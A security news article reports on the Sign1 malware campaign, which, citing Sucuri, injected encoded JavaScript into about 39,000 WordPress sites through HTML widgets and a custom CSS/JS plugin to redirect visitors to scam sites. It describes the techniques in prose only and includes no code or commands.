A sweeping onslaught of malicious software, identified as Sign1, has infiltrated a staggering 39,000 WordPress platforms within the past half-year, employing malevolent JavaScript insertions to reroute unsuspecting users to fraudulent websites.
The latest mutation of this malware, detected within the preceding two months, has purportedly compromised no fewer than 2,500 sites, as per a report unveiled by Sucuri earlier this week.
The assault tactic involves the implantation of illicit JavaScript within legitimate HTML widgets and plugins, thereby enabling the injection of arbitrary JavaScript and other codes, effectively providing assailants an avenue to integrate their deleterious scripts.
In the realm of cybersecurity, the XOR-encoded JavaScript segment is subsequently decrypted and utilized to trigger the execution of a JavaScript file stored on a distant server, thereby enabling the redirection of traffic to a traffic distribution system (TDS) operated by VexTrio, contingent upon specific conditions being met.
Moreover, the malware employs time-dependent randomization to access dynamic URLs, altering every 10 minutes to circumvent blacklist restrictions. These domains are typically registered a few days preceding their employment in nefarious activities.
A notable feature of this code is its scrutiny of the visitor’s origin, particularly scrutinizing if the user emanates from major websites such as Google, Facebook, Yahoo, or Instagram. Failure to match the referrer with these leading platforms results in the malware refraining from execution.
Subsequently, visitors are rerouted to other fraudulent sites via the execution of additional JavaScript retrieved from the same server.
The Sign1 offensive, initially identified in the latter half of 2023, has undergone multiple iterations, with perpetrators exploiting up to 15 distinct domains since July 31, 2023.
There are suspicions that these incursions into WordPress sites might be facilitated through brute-force assaults, although adversaries could also exploit vulnerabilities inherent in plugins and themes to gain unauthorized access.
According to security researcher Ben Martin, numerous injections are discovered within WordPress custom HTML widgets clandestinely added by assailants to compromised sites. Frequently, attackers employ a legitimate Simple Custom CSS and JS plugin to inject malevolent code clandestinely.
By abstaining from embedding any malicious code within server files, this modus operandi ensures the malware’s stealthy persistence over protracted periods, as affirmed by Sucuri.
